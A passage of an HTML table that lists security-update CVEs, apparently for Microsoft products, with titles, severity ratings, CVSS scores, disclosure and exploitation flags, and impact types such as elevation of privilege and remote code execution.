  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50365"><span>CVE-2026-50365</span></a></td>
  <td width="256" class="xl74">Remote Access
  Management service/API (RPC server) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54990"><span>CVE-2026-54990</span></a></td>
  <td width="256" class="xl74">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58594"><span>CVE-2026-58594</span></a></td>
  <td width="256" class="xl74">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56190"><span>CVE-2026-56190</span></a></td>
  <td width="256" class="xl74">Remote Desktop
  Protocol Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49783"><span>CVE-2026-49783</span></a></td>
  <td width="256" class="xl74">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42990"><span>CVE-2026-42990</span></a></td>
  <td width="256" class="xl74">SQL Server ODBC driver
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49168"><span>CVE-2026-49168</span></a></td>
  <td width="256" class="xl74">Storage Spaces Direct
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48581"><span>CVE-2026-48581</span></a></td>
  <td width="256" class="xl74">Surface Broker SDMA
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49180"><span>CVE-2026-49180</span></a></td>
  <td width="256" class="xl74">Universal Plug and
  Play (upnp.dll) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50455"><span>CVE-2026-50455</span></a></td>
  <td width="256" class="xl74">Universal Plug and
  Play (upnp.dll) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54111"><span>CVE-2026-54111</span></a></td>
  <td width="256" class="xl74">Universal Print
  Management Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58543"><span>CVE-2026-58543</span></a></td>
  <td width="256" class="xl74">Universal Print
  Management Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58601"><span>CVE-2026-58601</span></a></td>
  <td width="256" class="xl74">Virtual Hard Disk
  (VHD) Miniport Driver Elevation of Privilege Vulernability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50520"><span>CVE-2026-50520</span></a></td>
  <td width="256" class="xl74">Visual Studio Code
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45496"><span>CVE-2026-45496</span></a></td>
  <td width="256" class="xl74">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57101"><span>CVE-2026-57101</span></a></td>
  <td width="256" class="xl74">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57102"><span>CVE-2026-57102</span></a></td>
  <td width="256" class="xl74">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47305"><span>CVE-2026-47305</span></a></td>
  <td width="256" class="xl74">Visual Studio Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49805"><span>CVE-2026-49805</span></a></td>
  <td width="256" class="xl74">Win32k Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50297"><span>CVE-2026-50297</span></a></td>
  <td width="256" class="xl74">Win32k Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50325"><span>CVE-2026-50325</span></a></td>
  <td width="256" class="xl74">Win32k Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50489"><span>CVE-2026-50489</span></a></td>
  <td width="256" class="xl74">Win32k Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57095"><span>CVE-2026-57095</span></a></td>
  <td width="256" class="xl74">Win32k Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50416"><span>CVE-2026-50416</span></a></td>
  <td width="256" class="xl74">Win32k Information
  Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">3.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56184"><span>CVE-2026-56184</span></a></td>
  <td width="256" class="xl74">Win32k Information
  Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50432"><span>CVE-2026-50432</span></a></td>
  <td width="256" class="xl74">Window Virtual
  Filtering Platform (VFP) Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54119"><span>CVE-2026-54119</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57976"><span>CVE-2026-57976</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Domain Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50366"><span>CVE-2026-50366</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Domain Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49178"><span>CVE-2026-49178</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58529"><span>CVE-2026-58529</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services (ADFS) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54983"><span>CVE-2026-54983</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50695"><span>CVE-2026-50695</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50304"><span>CVE-2026-50304</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50368"><span>CVE-2026-50368</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50324"><span>CVE-2026-50324</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50355"><span>CVE-2026-50355</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50411"><span>CVE-2026-50411</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Federation Services Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58631"><span>CVE-2026-58631</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  (WAC) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56196"><span>CVE-2026-56196</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  (WAC) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56197"><span>CVE-2026-56197</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  (WAC) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56169"><span>CVE-2026-56169</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57107"><span>CVE-2026-57107</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56185"><span>CVE-2026-56185</span></a></td>
  <td width="256" class="xl74">Windows Admin Center
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50312"><span>CVE-2026-50312</span></a></td>
  <td width="256" class="xl74">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50462"><span>CVE-2026-50462</span></a></td>
  <td width="256" class="xl74">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57093"><span>CVE-2026-57093</span></a></td>
  <td width="256" class="xl74">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34346"><span>CVE-2026-34346</span></a></td>
  <td width="256" class="xl74">Windows Ancillary
  Function Driver for WinSock Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48572"><span>CVE-2026-48572</span></a></td>
  <td width="256" class="xl74">Windows App Package
  Installer Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48571"><span>CVE-2026-48571</span></a></td>
  <td width="256" class="xl74">Windows App Package
  Installer Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50400"><span>CVE-2026-50400</span></a></td>
  <td width="256" class="xl74">Windows App Package
  Installer Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50331"><span>CVE-2026-50331</span></a></td>
  <td width="256" class="xl74">Windows Application
  Model Core API Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49803"><span>CVE-2026-49803</span></a></td>
  <td width="256" class="xl74">Windows AppX
  Deployment Extensions Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50351"><span>CVE-2026-50351</span></a></td>
  <td width="256" class="xl74">Windows Audio
  Compression Manager (ACM) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50440"><span>CVE-2026-50440</span></a></td>
  <td width="256" class="xl74">Windows Audio Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34328"><span>CVE-2026-34328</span></a></td>
  <td width="256" class="xl74">Windows Audio Service
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50406"><span>CVE-2026-50406</span></a></td>
  <td width="256" class="xl74">Windows Backup Engine
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50364"><span>CVE-2026-50364</span></a></td>
  <td width="256" class="xl74">Windows Backup Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42975"><span>CVE-2026-42975</span></a></td>
  <td width="256" class="xl74">Windows Bluetooth Port
  Driver Remote Code Execution</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58538"><span>CVE-2026-58538</span></a></td>
  <td width="256" class="xl74">Windows Bluetooth
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58638"><span>CVE-2026-58638</span></a></td>
  <td width="256" class="xl74">Windows Boot Loader
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58637"><span>CVE-2026-58637</span></a></td>
  <td width="256" class="xl74">Windows Client-Side
  Caching Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50384"><span>CVE-2026-50384</span></a></td>
  <td width="256" class="xl74">Windows Clip Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49183"><span>CVE-2026-49183</span></a></td>
  <td width="256" class="xl74">Windows Clipboard
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50689"><span>CVE-2026-50689</span></a></td>
  <td width="256" class="xl74">Windows Clipboard
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50374"><span>CVE-2026-50374</span></a></td>
  <td width="256" class="xl74">Windows Cloud Files
  Mini Filter Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58536"><span>CVE-2026-58536</span></a></td>
  <td width="256" class="xl74">Windows Cloud Files
  Mini Filter Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58613"><span>CVE-2026-58613</span></a></td>
  <td width="256" class="xl74">Windows Cloud Files
  Mini Filter Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50401"><span>CVE-2026-50401</span></a></td>
  <td width="256" class="xl74">Windows Cloud Files
  Mini Filter Driver Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50697"><span>CVE-2026-50697</span></a></td>
  <td width="256" class="xl74">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50667"><span>CVE-2026-50667</span></a></td>
  <td width="256" class="xl74">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50421"><span>CVE-2026-50421</span></a></td>
  <td width="256" class="xl74">Windows Connected User
  Experiences and Telemetry Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50428"><span>CVE-2026-50428</span></a></td>
  <td width="256" class="xl74">Windows Container
  Isolation FS Filter Driver (unionfs.sys) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
